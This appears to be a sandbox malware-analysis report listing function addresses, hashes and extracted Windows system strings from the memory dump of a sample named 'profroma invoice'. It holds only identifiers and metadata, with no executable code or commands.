                                                          • Instruction Fuzzy Hash: FAC1C1312043429BEB25CF28C849B6BFBE5AFD8318F184A2DF696CB291D774D505CB52
                                                          Function 0179E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          • Opcode ID: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
                                                          • Instruction ID: 065c3699c00c5f04cb40dc7058710cceebe46d6c75e7407d6f24422f1acb81e7
                                                          • Opcode Fuzzy Hash: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
                                                          • Instruction Fuzzy Hash: 5C615871E407199FDB24DFA8D844BAEFBB9FB48700F14406DE649EB291DB31A944CB50
                                                          Function 017C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$MUI
                                                          • API String ID: 0-17815947
                                                          • Opcode ID: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                          • Instruction ID: f8de8f86df775d5018cd26ca86befbc7f8d8503946e7820aa37758b90c3312ba
                                                          • Opcode Fuzzy Hash: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                          • Instruction Fuzzy Hash: 75511871E0021DAEDB11DFA9CC94AEEFBBCEB54B54F100529EA11B7290D7309A05CB60
                                                          Function 017204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • kLsE, xrefs: 01720540
                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0172063D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                          • API String ID: 0-2547482624
                                                          • Opcode ID: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                          • Instruction ID: e28f8e93adf7a3a0787b8c05ee6ac45ee5116a9e94557eb56b6f5c8948f07373
                                                          • Opcode Fuzzy Hash: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                          • Instruction Fuzzy Hash: 53519C715047528FD734DF69C544AA7FBE4AF84304F20483EFAAA87241E7749546CFA2
                                                          Function 0172A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0172A309
                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0172A2FB
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                          • API String ID: 0-2876891731
                                                          • Opcode ID: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                          • Instruction ID: a97f029b315711bd60d75fbc3a913aacd86ffe127a9ecfaecc8e1e0fdcdc8ea5
                                                          • Opcode Fuzzy Hash: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                          • Instruction Fuzzy Hash: 2C41CC31A01669DBDB21DF69C844B6EFBB4FF84700F2440A9E900DB693E2B5D941CB90
                                                          Function 0175A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Cleanup Group$Threadpool!
                                                          • API String ID: 2994545307-4008356553
                                                          • Opcode ID: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                          • Instruction ID: bee52fb0c18b88431526460da0bd155e611e97da8c9603a898ac1adce85c60f2
                                                          • Opcode Fuzzy Hash: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                          • Instruction Fuzzy Hash: 2001F4B2640740AFD351DF24CD49F16B7E8EB94715F058A3DAA49C7190E3B4D904CB56
                                                          Function 0172C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MUI
                                                          • API String ID: 0-1339004836
                                                          • Opcode ID: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                                          • Instruction ID: 334f0514766d71f5b8d0de6f656e11b61c361e683e0fd138e9c2815f41c2e950
                                                          • Opcode Fuzzy Hash: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                                          • Instruction Fuzzy Hash: DC826B75E002288FEB25CFA9C884BEDFBB5FF58310F148169D959AB355D7309982CB50
                                                          Function 017A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                          • Instruction ID: e6fd89486bf55db7baa08dd12fdcf986ebaafdc7ff06a4cab2d0b80dc0653251
                                                          • Opcode Fuzzy Hash: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                          • Instruction Fuzzy Hash: D1919272940219AFEB21DF94CD85FAEFBB8EF58750F540165F600AB195D774AD00CBA0
                                                          Function 017CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                          • Instruction ID: 78d84c9edf698a3cf8cdf2bc16bb59007bba98319b16c986d52c20030ad652e1
                                                          • Opcode Fuzzy Hash: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                          • Instruction Fuzzy Hash: D6917072901649AFDB22ABA5DC48FAFFF7AEF85B50F10002DF501A7251EB74A901CB51
                                                          Function 0175A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalTags
                                                          • API String ID: 0-1106856819
                                                          • Opcode ID: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                                          • Instruction ID: b58ee1a6311c1ae20e2d66f15cbf8d822e0e9ea5aff8a023d18d1f09d6bc7bb2
                                                          • Opcode Fuzzy Hash: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                                          • Instruction Fuzzy Hash: E47160B5E0020A9FDF28CF9CE590AADFBB1BF48710F14826EF905AB245E7719945CB50
                                                          Function 017C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .mui
                                                          • API String ID: 0-1199573805
                                                          • Opcode ID: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                                          • Instruction ID: b43c0b8c344bcb9c09fb3db9db4954580171aa29c2d3c979181e33ba472d20bc
                                                          • Opcode Fuzzy Hash: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                                          • Instruction Fuzzy Hash: F5519C72D0022ADBDB10DF9DD854AAEFBB4AF08F50F05416EEA12BB254D3349D01CBA4
                                                          Function 0173E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EXT-
                                                          • API String ID: 0-1948896318
                                                          • Opcode ID: 5cdb6adbe25e606278d503117ec4eaa6dd161ab24c07e5bf5fc972d832897e47
                                                          • Instruction ID: efd5843aef838ffb2ec29d22b7bfa9a209583a2626ee88f5456fd93e4cfea7a7
                                                          • Opcode Fuzzy Hash: 5cdb6adbe25e606278d503117ec4eaa6dd161ab24c07e5bf5fc972d832897e47
                                                          • Instruction Fuzzy Hash: C941A0725083169BD722DA75C844BABFBE8AFC8714F04092DFA84E7181EB74D904C797
                                                          Function 0179C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          • API String ID: 0-2202222882
                                                          • Opcode ID: 85dbadb722f4fd83cbe14d8cc4a1bd6aef55d60694ad72464c86c9e79917d9ca
                                                          • Instruction ID: e7619280901aa4b5581a27708df533cc6afe36f773f073f6e86c43d4470e76ea
                                                          • Opcode Fuzzy Hash: 85dbadb722f4fd83cbe14d8cc4a1bd6aef55d60694ad72464c86c9e79917d9ca
                                                          • Instruction Fuzzy Hash: 3C4162B1D0022DAEDF21DB50DC84FDEF77CAB44714F0045A5AB08AB145DB709E888FA4
                                                          Function 017B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: fac41f26736cfb4a68d0ad763c8fb23dd1e5af034697dfc82880305e9c27bf5c
                                                          • Instruction ID: b3f84210d92c9709e29ef309312cdd939782f527da144a47024e5e49e212d910
                                                          • Opcode Fuzzy Hash: fac41f26736cfb4a68d0ad763c8fb23dd1e5af034697dfc82880305e9c27bf5c
                                                          • Instruction Fuzzy Hash: EB310531A007199BEB22DF69C894BEEFBB8DF45704F144068FA45AB282DB75ED05CB50
                                                          Function 0179CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryName
                                                          • API String ID: 0-215506332
                                                          • Opcode ID: 06985b685cfadeb34c43cc3e69979a438c63ebdc30d7c27b2aed52256df45fe5
                                                          • Instruction ID: a18ef6f5ee8c1b62f4cd8f612f696ce074dd49b5d16868ffe456a716a9411bc3
                                                          • Opcode Fuzzy Hash: 06985b685cfadeb34c43cc3e69979a438c63ebdc30d7c27b2aed52256df45fe5
                                                          • Instruction Fuzzy Hash: F3310336900515AFEF16DB58D845E7FFB74EB80760F014169A905AB291D7309E08EBE0
                                                          Function 017A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017A895E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                          • API String ID: 0-702105204
                                                          • Opcode ID: 07db58fffb1655e15748fc6ca74c1823628dc34df3b7eaa3469d37ff5aba1a13
                                                          • Instruction ID: e12fd571fead50e5b09d6e6fd561b46269c75837e558d974914eaf9a1ed8d91a
                                                          • Opcode Fuzzy Hash: 07db58fffb1655e15748fc6ca74c1823628dc34df3b7eaa3469d37ff5aba1a13
                                                          • Instruction Fuzzy Hash: 64012B732002119BE7216B59CC88E96FF69EFC6755B84022CF78506559CB246882CB93
                                                          Function 017C2000 Relevance: .8, Instructions: 757COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 57cdefb0f4f11a8237b61ac2cb20159d934f0be5ad168fe21db98a18a2b246ed
                                                          • Instruction ID: 97ec14549b2f282836cc629e00522456579741ba0f8ca51d020da1a4436ceb96
                                                          • Opcode Fuzzy Hash: 57cdefb0f4f11a8237b61ac2cb20159d934f0be5ad168fe21db98a18a2b246ed
                                                          • Instruction Fuzzy Hash: D442D2766083419FE725CF68C890A6BFBE5BFC8B40F18092DFA8297252D770D945CB52
                                                          Function 017B8158 Relevance: .6, Instructions: 617COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8c9557d20437300e072d43b3986131d588f5f358d4dd505fe58ac39c23388ab1
                                                          • Instruction ID: 71a1ead87f07317500e1e874433b712355e7a394e111563f06fc769464fcb846
                                                          • Opcode Fuzzy Hash: 8c9557d20437300e072d43b3986131d588f5f358d4dd505fe58ac39c23388ab1
                                                          • Instruction Fuzzy Hash: F8424D75A102198FEB24CF69C881BEDFBF9BF48304F188199E949EB242D7349985CF51
                                                          Function 01732840 Relevance: .6, Instructions: 605COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                                          • Instruction ID: b43ae686c2182e96e1084eaf4d94d3af3f027e43e54e6f2f9e4865f07666ea20
                                                          • Opcode Fuzzy Hash: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                                          • Instruction Fuzzy Hash: 6E32F070A40755AFEB25EF69C8487BEFBF2BF84304F24411DE58A9B285D735A842CB50
                                                          Function 017CA118 Relevance: .6, Instructions: 591COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                                          • Instruction ID: 4ae8b1277a4f1497b5cc96fab624c2b81cbe4d1919f89a15483374f7d94650db
                                                          • Opcode Fuzzy Hash: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                                          • Instruction Fuzzy Hash: 0B22AD706046698BEB25CF2DC094772FBF1BF84B02F18849ED9868B286F735D552DB60
                                                          Function 01726A50 Relevance: .5, Instructions: 548COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                                          • Instruction ID: 0ddf44e4240fc6dc4a600ebd960d571f9509ee258f4b418eb5470495567e89ea
                                                          • Opcode Fuzzy Hash: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                                          • Instruction Fuzzy Hash: D0329F71A04215CFDB25DF68C480BAAFBF1FF48310F2485AAE956AB755D734E842CB50
                                                          Function 01744A35 Relevance: .4, Instructions: 423COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                          • Instruction ID: 9721b5e01ae2eb0bafb21969d6708c399d3bf107ccd0a0786175bb3ca6c9a106
                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                          • Instruction Fuzzy Hash: 60F17071E0021A9BDB15DFA9C584BAEFBF5BF48710F088129EA46AB345E734D841DB90
                                                          Function 017B892B Relevance: .4, Instructions: 386COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                          • Instruction ID: 444b36b14249ee1f9a8dc10e92bbb23e2a0e7e0a27f9d195f6c5bd1b8689ce56
                                                          • Opcode Fuzzy Hash: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                          • Instruction Fuzzy Hash: 9AD1E171A0060A8BDF15CF69C881BFEF7F9AF88304F1881AAD955E7241D735EA05CB61
                                                          Function 017265D0 Relevance: .4, Instructions: 383COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                          • Instruction ID: ccbe04446b6093c0de2c51b1b71074fcea9298715a671d7af77c1df27869e052
                                                          • Opcode Fuzzy Hash: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                          • Instruction Fuzzy Hash: 2DE16B71608352CFC715DF28C490A6AFBE0BF89314F15896EF99587352EB31E906CB92
                                                          Function 01718397 Relevance: .4, Instructions: 380COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                          • Instruction ID: 5cc4ea796fa55ace53f6aaf07122a5d34fbdef9a8ac48347a906ba0713462d21
                                                          • Opcode Fuzzy Hash: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                          • Instruction Fuzzy Hash: C9D1EF71A002069BDF14DF6CC880ABAF7A5BF54314F14466DEA16DB288EB34E951CB62
                                                          Function 017A8243 Relevance: .3, Instructions: 322COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction ID: d623bdc20124b2e94263ff13738f51357e4db6214912d9809230375a038651a2
                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction Fuzzy Hash: 22B1BE75A00605AFEB24DF98C944BABFBB9BFC4305F90462DAA4297394DA30E905CB11
                                                          Function 01730535 Relevance: .3, Instructions: 300COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction ID: c2094183a5523e73012e033723a4f7dfb41a39ebd0bcabb5032f9140a1097150
                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction Fuzzy Hash: 0BB1E531604646AFDB26DB68C854FBEFBF6AF84300F280199E552D7386DB70E941DB90
                                                          Function 017283C0 Relevance: .3, Instructions: 281COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd56ee4c4050a41608baf072da25c3f418e885f64266ba054cf11be1333a8829
                                                          • Instruction ID: da7fb99e1c3d095bbfcd58ab7e874d5a139ff70be9b325233726a6df487ccaa3
                                                          • Opcode Fuzzy Hash: cd56ee4c4050a41608baf072da25c3f418e885f64266ba054cf11be1333a8829
                                                          • Instruction Fuzzy Hash: 36C166702083818FE764DF19C494BABF7E4BF88304F54496DE98987291E775EA09CF92
                                                          Function 0171C427 Relevance: .3, Instructions: 280COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 087e748dd28097af80d0bcca7c190cf246af3f879e78f326df6a74ec66ec27c5
                                                          • Instruction ID: 988fcff5d82b4b5e6ef6969dfcf36f7d438e0c40c30f93ac00d11697c8e41a60
                                                          • Opcode Fuzzy Hash: 087e748dd28097af80d0bcca7c190cf246af3f879e78f326df6a74ec66ec27c5
                                                          • Instruction Fuzzy Hash: A5B17070A402668BEB75CF68C880BADF7B5EF44700F1485E9D50AE7285EB70DD85CB21
                                                          Function 0174E5E7 Relevance: .3, Instructions: 278COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 07c345be85de48878c5e7b566201de9a1ccf5a1946e19aba8b80063f2040e8c7
                                                          • Instruction ID: 188991f072076a5147c2e248b41ecc058eda3bd3857a9c64f25a64bf63d4ab27
                                                          • Opcode Fuzzy Hash: 07c345be85de48878c5e7b566201de9a1ccf5a1946e19aba8b80063f2040e8c7
                                                          • Instruction Fuzzy Hash: A8A10831E406159FEB22EB6CC848FADFBB4FB41724F150165EA41AB291DB789E40CB91
                                                          Function 01760185 Relevance: .3, Instructions: 276COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5731b741abe93caa5cf0aa13a85c340b19c06b75fbf2c06e3dbd8f9b56b79135
                                                          • Instruction ID: 0a8e8d5f18d13c9ff991e977b7f7fcc39d7ea4e8eb07f3d42be652a36e77dcd4
                                                          • Opcode Fuzzy Hash: 5731b741abe93caa5cf0aa13a85c340b19c06b75fbf2c06e3dbd8f9b56b79135
                                                          • Instruction Fuzzy Hash: 4BA1D071B016169FEB25CF69D994BAAFBB9FF44314F10402DEE0597281EB34E815CB90
                                                          Function 017F4500 Relevance: .3, Instructions: 275COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
